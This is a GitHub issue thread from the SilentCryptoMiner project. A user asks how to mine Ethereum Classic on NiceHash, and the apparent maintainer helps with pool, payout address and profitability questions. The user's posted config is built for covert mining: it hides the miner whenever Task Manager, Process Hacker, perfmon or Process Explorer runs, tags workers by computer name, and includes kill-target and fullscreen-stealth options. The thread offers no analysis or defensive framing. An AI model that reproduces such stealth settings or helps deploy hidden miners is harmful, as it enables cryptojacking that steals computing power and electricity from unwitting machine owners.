### ISSUE TITLE
mine etherum classic on nicehash

### ISSUE THREAD

**Issue by Frax-Python** [UnamSanctam/SilentCryptoMiner#1805]
Hello Unam, is it possible to mine etc on nicehash? because when i make the builder it doesnt show up the setting "NiceHash" like monero, can u help me please? 
this is my setting
`{
    "url": "stratums://`NHbSdFTTMUsjR9qknmsMaoaUQvTw7tvAirbR.{COMPUTERNAME}`:x@etchash.auto.nicehash.com:443",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 5,
    "idle-gpu": 90,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": true
}`

**Comment by UnamSanctam** [comment]
Yes you just connect to it like any other pool, though there are many things that are more profitable than ETC (https://whattomine.com/) at the moment. Though that BTC address doesn't seem correct, are you sure that it's correct?

**Comment by Frax-Python** [comment]
its my mining address

**Comment by Frax-Python** [comment]
what should i put for receiving my crypto?

**Comment by UnamSanctam** [comment]
Hmm alright, usually I don't think BTC addresses can start with an N except for maybe testnet addresses. Are you sure that's your NiceHash Bitcoin address? Since NiceHash is a hashrate marketplace, when you mine to NiceHash you don't actually mine on a pool. You're instead selling your hashrate on their marketplace, and then they pay you in BTC.

**Comment by Frax-Python** [comment]
But if i put on the miner the btc address and i mine monero then this will not work right?

**Comment by UnamSanctam** [comment]
If it's NiceHash then you should always use the BTC address, since that's how they pay you when your hashrate is sold.

**Comment by Frax-Python** [comment]
I dont wanna sell my hashrate i wanna buy it for add a boost to my miners

**Comment by UnamSanctam** [comment]
NiceHash is a hashrate marketplace, so when you mine to NiceHash you're selling your hashrate on that marketplace, someone then buys your hashrate and you get paid in BTC. If you actually want to mine ETC or XMR then you should use a "real" pool and not NiceHash.

**Comment by Frax-Python** [comment]
Its more profitable to mine on nicehash or a normal pool?

**Comment by UnamSanctam** [comment]
It's about the same, due to supply and demand equalizing the profitability.

**Comment by Frax-Python** [comment]
Raven coin is more profitable?

**Comment by UnamSanctam** [comment]
Yes.
